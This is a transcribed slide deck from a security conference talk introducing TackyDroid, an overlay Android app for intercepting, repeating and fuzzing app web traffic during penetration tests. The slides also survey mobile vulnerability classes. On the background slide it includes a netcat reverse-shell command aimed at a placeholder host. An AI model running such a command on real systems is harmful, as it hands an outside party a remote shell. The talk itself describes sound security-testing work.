TACKYDROID. Pentesting Android Applications in Style



Similar documents
Mobile Application Hacking for Android and iphone. 4-Day Hands-On Course. Syllabus

Web Application Penetration Testing

How to break in. Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering

How Security Testing can ensure Your Mobile Application Security. Yohannes, CEHv8, ECSAv8, ISE, OSCP(PWK) Information Security Consultant

Detecting Web Application Vulnerabilities Using Open Source Means. OWASP 3rd Free / Libre / Open Source Software (FLOSS) Conference 27/5/2008

PCI Security Standards Council

Ethical Hacking as a Professional Penetration Testing Technique

Enterprise Application Security Workshop Series

Mobile Security Framework

Cracking the Perimeter via Web Application Hacking. Zach Grace, CISSP, CEH January 17, Mega Conference

Passing PCI Compliance How to Address the Application Security Mandates

Using the Push Notifications Extension Part 1: Certificates and Setup

Mobile Application Hacking for ios. 3-Day Hands-On Course. Syllabus

Best Practice Guide (SSL Implementation) for Mobile App Development 最 佳 行 事 指 引. Jointly published by. Publication version 1.

Secure Web Application Coding Team Introductory Meeting December 1, :00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda

ArcGIS Server Security Threats & Best Practices David Cordes Michael Young

Workday Mobile Security FAQ

ABSTRACT' INTRODUCTION' COMMON'SECURITY'MISTAKES'' Reverse Engineering ios Applications

Cloud Security:Threats & Mitgations

What is Web Security? Motivation

Testing the OWASP Top 10 Security Issues

FINAL DoIT v.4 PAYMENT CARD INDUSTRY DATA SECURITY STANDARDS APPLICATION DEVELOPMENT AND MAINTENANCE PROCEDURES

Mobile Application Security

Conducting Web Application Pentests. From Scoping to Report For Education Purposes Only

Where every interaction matters.

Weak Spots in Enterprise Mobility Management Dennis Schröder

3. Broken Account and Session Management. 4. Cross-Site Scripting (XSS) Flaws. Web browsers execute code sent from websites. Account Management

Michael Seltzer COMP 116: Security Final Paper. Client Side Encryption in the Web Browser Mentor: Ming Chow

APPLICATION SECURITY: FROM WEB TO MOBILE. DIFFERENT VECTORS AND NEW ATTACK

Application security testing: Protecting your application and data

OWASP NZ Day 2011 Testing Mobile Applications

IoT IT Security and Secure Development Life Cycle

Thick Client Application Security

Advanced ANDROID & ios Hands-on Exploitation

Will Dormann: Sure. Fuzz testing is a way of testing an application in a way that you want to actually break the program.

Testing for Security

CompTIA Mobile App Security+ Certification Exam (ios Edition) Live exam IOS-001 Beta Exam IO1-001

Web attacks and security: SQL injection and cross-site scripting (XSS)

Penetration Testing for iphone Applications Part 1

Detecting and Exploiting XSS with Xenotix XSS Exploit Framework

This session was presented by Jim Stickley of TraceSecurity on Wednesday, October 23 rd at the Cyber Security Summit.

OWASP Top Ten Tools and Tactics

Web Application Vulnerability Testing with Nessus

Is Your SSL Website and Mobile App Really Secure?

Web application testing

Pentesting With Burp Suite Taking the web back from automated scanners

Android & ios Application Vulnerability Assessment & Penetration Testing Training. 2-Day hands on workshop on VAPT of Android & ios Applications

BYOD Guidance: BlackBerry Secure Work Space

Out of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet

(WAPT) Web Application Penetration Testing

Excellence Doesn t Need a Certificate. Be an. Believe in You AMIGOSEC Consulting Private Limited

AVG Business SSO Partner Getting Started Guide

Develop a Native App (ios and Android) for a Drupal Website without Learning Objective-C or Java. Drupaldelphia 2014 By Joe Roberts

Mobile Application Security Testing ASSESSMENT & CODE REVIEW

Attack and Penetration Testing 101

Adobe Systems Incorporated

Application Security Testing. Erez Metula (CISSP), Founder Application Security Expert

Administering Jive Mobile Apps

Android (in)security. Having fun with Android. Sarantis Makoudis

Hack Yourself First. Troy troyhunt.com

Web Application Hacking (Penetration Testing) 5-day Hands-On Course

Building a Mobile App Security Risk Management Program. Copyright 2012, Security Risk Advisors, Inc. All Rights Reserved

The Social-Engineer Toolkit (SET)

ios Security The Never-Ending Story of Malicious Profiles Adi Sharabani Yair Amit CEO & Co-Founder Skycure CTO & Co-Founder

A6- Sensitive Data Exposure

Web Maniac Hacking Trust. Aditya K Sood [adi_ks [at] secniche.org] SecNiche Security

Crosswalk: build world class hybrid mobile apps

WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY

MASTER'S THESIS. Android Application Security with OWASP Mobile Top James King 2014

Using the owncloud Android App

2X SecureRemoteDesktop. Version 1.1

IS L06 Protect Servers and Defend Against APTs with Symantec Critical System Protection

Mobile Applications: The True Potential Risks Where to look for information when performing a Pentest on a Mobile Application

AGENDA. Background. The Attack Surface. Case Studies. Binary Protections. Bypasses. Conclusions

Reading an sent with Voltage Secur . Using the Voltage Secur Zero Download Messenger (ZDM)

Securing ios Applications. Dr. Bruce Sams, OPTIMAbit GmbH

SYLLABUS MOBILE APPLICATION SECURITY AND PENETRATION TESTING. MASPT at a glance: v1.0 (28/01/2014) 10 highly practical modules

Bug Report. Date: March 19, 2011 Reporter: Chris Jarabek

Web applications. Web security: web basics. HTTP requests. URLs. GET request. Myrto Arapinis School of Informatics University of Edinburgh

Improving Web Vulnerability Scanning. Daniel Zulla

BYOD in the Enterprise

WHITE PAPER. FortiWeb and the OWASP Top 10 Mitigating the most dangerous application security threats

WHITE PAPER FORTIWEB WEB APPLICATION FIREWALL. Ensuring Compliance for PCI DSS 6.5 and 6.6

Virtually Pwned Pentesting VMware. Claudio

The Android Developers Guide to 3 rd -Party SDK Assessment and Security

Cyber Security Workshop Ethical Web Hacking

DISCOVERY OF WEB-APPLICATION VULNERABILITIES USING FUZZING TECHNIQUES

Mobile Device Penetration Testing Framework and Platform for the Mobile Device Security Course

Web application security: Testing for vulnerabilities

Secure Coding in Node.js

Transcription:

TACKYDROID Pentesting Android Applications in Style

THIS TALK IS ABOUT AN APP WE ARE MAKING This talk IS NOT about Android platform itself This talk IS about how we want to contribute auditing apps that run on Android systems With an additional focus on web application penetration testing Flappy bird is lame now, so we ll play helpless hero WARNING!

Background Spot the hacker What the f@#k is tackydroid Why we made it Tackydroid features/internals Demo Future work Questions AGENDA

$ whoami ; id ; uname -r ; cat /etc/*-release $ nc x.x.x.x 443 -e /bin/sh BACKGROUND

Chris Liu Claims to be a security engineer at Rakuten, Inc. Do a little penetration testing when he s bored at work CHRIS / KURISU

You may not know me MATT WHO THE HELL?!

MATT WHO THE HELL?!

Apparently works with Chris Sometimes found at the office Does security stuff MATT

spot the hacker

not a haxor

no haxor here

hacker cat for sure

TackyDroid???

Simply put, Tackydroid is NOT JUST A PROXY Tacky [ `tækɪ ] Sticky, not dried Gaudy In bad taste What the f@#k is TackyDroid???

It s not a proxy... What the f@#k is TackyDroid???

It s overlaid so that makes it cool and very hipster. What the f@#k is TackyDroid???

SAVE TIME: no need to setup up anything Bored of information leakage vulnerabilities Want to be hipster for once Seriously, lets bring more tools to mobile platform Why we started

Speaks in conferences and travel around to avoid tedious office work(don t tell our boss) Also we wanna go use this opportunity to go home ;) hipster m0de

More tools, more discussions in the security industry Keep us busy on the weekend Wanna buy us beers? More tools for you

What is this number? 90% Random Stats

What is this number? 90% Sure that random stats make presentations better Crazy setups

Simply put, a mobile application development environment can be very unique in terms of access MDM setup can be a pain But what if the STG environment is in another network Also what about outsourced projects?? (these are the worst). Crazy setups

Stuck in front of our desk Mobile projects are not really mobile Crazy setups

When auditing Android apps, it could basically be split into two parts Client side code Server side code (Web APIs) Fun part normally stays in the web or web api used by the app Most apps just calls existing web APIs anyway l33t vulns

Owasp mobile top ten M1: Weak server side control M2: Insecure data storage M3: Insufficient transport layer protection M4: Unintended data leakage M5: Poor authorization and authentication M6: Broken Cryptography M7: Client side injection M8: Security decision via untrusted inputs M9: Improper session handling M10: Lack of binary protections l33t vulns

M1: Weak server side control More related to server side configuration But you access it via web API M5: Poor authorization and authentication Allows an adversary to execute functionality they should not be entitled M9: Improper session handling Session token is unintentionally shared l33t vulns

Exported Content providers Malicious Intents Preferences and Storage Storing shit on the SD card World readable files Client side vulns in a droidshell

Client side vulns in a droidshell

l33t vulns

Most mobile app vulnerabilities nowadays are related to information leakage Preference files SQLite database files Log functions blah MITM attack and more... Most of them only exists when a phone is lost or rooted When did storing data inside a sandbox become a crime? Just looks at Google s apps... l33t vulns

Mozilla Firefox for Android CVE-2014-1527 Security Vulnerability Successfully exploiting this issue may allow an attacker to redirect users to an attacker-controlled site Google Chrome for Android CVE-2014-1710 Memory Corruption Vulnerability Apache Cordova For Android CVE-2014-3500 Security Bypass Vulnerability Attackers can exploit this issue to bypass certain security restrictions to perform unauthorized actions l33t vulns

l33t vulns

Enough bullshit, let s get into TackyDroid Tackydroids guts

No root is needed Features, features, features! UI design Interceptor Repeater Dumb fuzzer Automatic fuzzer (Future work) Tackydroids guts

BUT you need root to intercept traffics from apps other than the browser Sorry we decided to use IPTables :( No root privilege is needed

Remember the small overlayed bubble in your Facebook app? F@#k u messenger app Sits over applications, no need to switch between activities Can easily be moved around Opens with a single click Translucent UI design - Thank you F@cebook!!

UI design - Overlayyyyedddd

UI design - Overlayyyyedddd

Power to intercept traffics on the fly Request modification Not to mention Cartman beefs up when there s a incoming request Interceptor

BEEFCAKE!

Interceptor

Short quicklist that makes modifying requests a breeze We all hate typing inside an mobile device QUICKLIST

Interceptor

Interceptor

When you wanna play around with a request, you can send the request to the repeater tab Request modification Response examination Response could also be displayed in webview Repeater

Repeater

Repeater

Garbage in, garbage out you can choose your favorite payload from fuzzdb And basically determine if any vuln exists by yourself Raw responses, and also can be shown in repeaters webview Dumb fuzzer

Dumb fuzzer

Dumb fuzzer

Dumb fuzzer

Currently under development but will be pushed out pretty soon Automatic garbage in, automatic garbage out Automatic fuzzer

Get a feel of the overlayed magic Attack DVWA (Damn Vulnerable Web Application) from the browser Interception History list Repeater Simple fuzzers (the beta of all the betas) Time for Helpless hero Demo

Now you ve seen it but why should you care? That s all folks

Freedom to audit anywhere Give you a quick look at apps Stealth mode Analyze traffic for online games And more Usage Examples

Bug Hunting SSL Issues XSS SQLi Usage Examples

JAVA! Problems we faced

Most java libraries are gimped on Android How do we maintain the user experience without having to switch between activities Screen space Shitty mobile keyboards Text selection is broke Really shitty mobile keyboards Holy f@#k screen space Initial problems

Aside from the obvious proxy functionality Translucent interface that acts as if it is a native debug functionality for the target app Removal of the desktop in the middle Penetration testing from a phone, on a bus, or while playing games Hopefully more discussions on mobile platform tools Conclusion

Built-in hand warmer <3 And a good way to drain your battery too!!! Web application auditing via the built-in browser Lots of hidden bugs Free giveaways

Add more fuzzing capabilities Add Smarter fuzzer Improved UI Web spider ios version of the app is on it s way...maybe... and more maybe... FUTURE WORK

NEW UI!!!

NEW UI!!!

Tacky is free ;) We accept all donations for beer GitHub https://github.com/kurisuryu/tacky GOOD NEWS

Tons of Bugs Not ready for a full release Not Open sourced Maintain control over the project Did we mention bugs? Bad news

code looks like this

Anything but about the proxy QUESTIONS?

THANK YOU HITB